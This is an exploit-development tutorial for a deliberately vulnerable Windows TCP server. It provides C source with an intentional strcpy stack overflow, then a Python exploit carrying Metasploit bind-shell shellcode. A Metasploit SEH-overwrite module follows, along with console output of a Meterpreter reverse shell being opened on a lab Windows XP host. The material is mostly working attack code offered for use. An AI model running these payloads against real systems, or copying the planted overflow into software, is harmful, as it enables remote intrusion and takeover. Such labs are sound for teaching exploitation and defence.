Create Vuln Server
Compile the source code with VC6.0 / Dev C++.
#include <iostream.h>
#include <stdio.h>
#include <winsock.h>
#include <windows.h>
//load windows socket
#pragma comment(lib, "wsock32.lib")
//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}
int main(int argc, char **argv)
{
WORD sockVersion;
WSADATA wsaData;
int rVal;
char Message[5000]="";
char buf[2000]="";
// server port: 9000
u_short LocalPort;
LocalPort = 9000;
//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);
//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}
SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;
//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}
//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}
printf("[+] listening on tcp/9000... \n");
//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}
int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf("\nConnection Closed.\n");
break;
}
}
//Pass the data received to the function pr
pr(Message);
//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);
WSACleanup();
return SS_OK;
}
Stack Overflow
Please exploit vuln-server.exe with stack overflow bug.
#!/usr/bin/env python
# -*- coding: utf8 -*-
import socket
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ret = csock.connect_ex(("127.0.0.1", 9000))
if (ret == 0):
junk = "A" * 500
eip = "\x7B\x46\x86\x7C" # 7C86467B
# bad chars: 00
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
buf = "\x90" * 20
buf += "\xba\x09\xb0\x2e\x7e\xdb\xc0\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x53\x83\xc5\x04\x31\x55\x0e\x03\x5c\xbe\xcc"
buf += "\x8b\xa2\x56\x92\x74\x5a\xa7\xf3\xfd\xbf\x96\x33\x99"
buf += "\xb4\x89\x83\xe9\x98\x25\x6f\xbf\x08\xbd\x1d\x68\x3f"
buf += "\x76\xab\x4e\x0e\x87\x80\xb3\x11\x0b\xdb\xe7\xf1\x32"
buf += "\x14\xfa\xf0\x73\x49\xf7\xa0\x2c\x05\xaa\x54\x58\x53"
buf += "\x77\xdf\x12\x75\xff\x3c\xe2\x74\x2e\x93\x78\x2f\xf0"
buf += "\x12\xac\x5b\xb9\x0c\xb1\x66\x73\xa7\x01\x1c\x82\x61"
buf += "\x58\xdd\x29\x4c\x54\x2c\x33\x89\x53\xcf\x46\xe3\xa7"
buf += "\x72\x51\x30\xd5\xa8\xd4\xa2\x7d\x3a\x4e\x0e\x7f\xef"
buf += "\x09\xc5\x73\x44\x5d\x81\x97\x5b\xb2\xba\xac\xd0\x35"
buf += "\x6c\x25\xa2\x11\xa8\x6d\x70\x3b\xe9\xcb\xd7\x44\xe9"
buf += "\xb3\x88\xe0\x62\x59\xdc\x98\x29\x36\x11\x91\xd1\xc6"
buf += "\x3d\xa2\xa2\xf4\xe2\x18\x2c\xb5\x6b\x87\xab\xba\x41"
buf += "\x7f\x23\x45\x6a\x80\x6a\x82\x3e\xd0\x04\x23\x3f\xbb"
buf += "\xd4\xcc\xea\x56\xdc\x6b\x45\x45\x21\xcb\x35\xc9\x89"
buf += "\xa4\x5f\xc6\xf6\xd5\x5f\x0c\x9f\x7e\xa2\xaf\x8e\x22"
buf += "\x2b\x49\xda\xca\x7d\xc1\x72\x29\x5a\xda\xe5\x52\x88"
buf += "\x72\x81\x1b\xda\x45\xae\x9b\xc8\xe1\x38\x10\x1f\x36"
buf += "\x59\x27\x0a\x1e\x0e\xb0\xc0\xcf\x7d\x20\xd4\xc5\x15"
buf += "\xc1\x47\x82\xe5\x8c\x7b\x1d\xb2\xd9\x4a\x54\x56\xf4"
buf += "\xf5\xce\x44\x05\x63\x28\xcc\xd2\x50\xb7\xcd\x97\xed"
buf += "\x93\xdd\x61\xed\x9f\x89\x3d\xb8\x49\x67\xf8\x12\x38"
buf += "\xd1\x52\xc8\x92\xb5\x23\x22\x25\xc3\x2b\x6f\xd3\x2b"
buf += "\x9d\xc6\xa2\x54\x12\x8f\x22\x2d\x4e\x2f\xcc\xe4\xca"
buf += "\x51\x3c\x34\xc7\xc6\xe7\xad\xaa\x8a\x17\x18\xe8\xb2"
buf += "\x9b\xa8\x91\x40\x83\xd9\x94\x0d\x03\x32\xe5\x1e\xe6"
buf += "\x34\x5a\x1e\x23"
nops = "\x90" * 1500
payload = junk + eip + buf + nops
csock.send(payload)
csock.close()
Write MSF exploit script
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info={})
super(update_info(info,
'Name' => 'Custom Vulnable Tcp Server Buffer Overflow',
'Description' => %q{
'This module exploits a custom windows tcp server'
},
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE,
'DefaultOptions' => {
'EXITFUNC' => 'process',
'AllowWin32SEH' => true
},
'Payload' => {
'Space' => 1400,
'BadChars' => "\x00\xFF",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP3 En', {'Ret' => 0x7C86467B, 'Offset' => 496}]
],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => 'June 20 2015'
))
register_options([Opt::RPORT(9000)], self.class)
end
def exploit
# [*] Started reverse handler on 192.168.1.108:4444
# [-] Exploit failed: TypeError no implicit conversion of String into Integer
connect
sploit = rand_text(target['Offset'])
sploit << generate_seh_record(target.ret)
# sploit << make_nops(50)
sploit << payload.encoded
sock.put(sploit)
handler
disconnect
end
end
Exploit Vuln Server with MSF
msf exploit(custom_vulnserver) > show options
Module options (exploit/windows/misc/custom_vulnserver):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.105 yes The target address
RPORT 9000 yes The target port
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.1.108 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP SP3 En
msf exploit(custom_vulnserver) > exploit
[*] Started reverse handler on 192.168.1.108:8080
[*] Sending stage (884270 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.108:8080 -> 192.168.1.105:1557) at 2015-06-22 11:16:47 +0000
meterpreter > sysinfo
Computer : CORELAN-LAB
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : MSHOME
Logged On Users : 2
Meterpreter : x86/win32
meterpreter >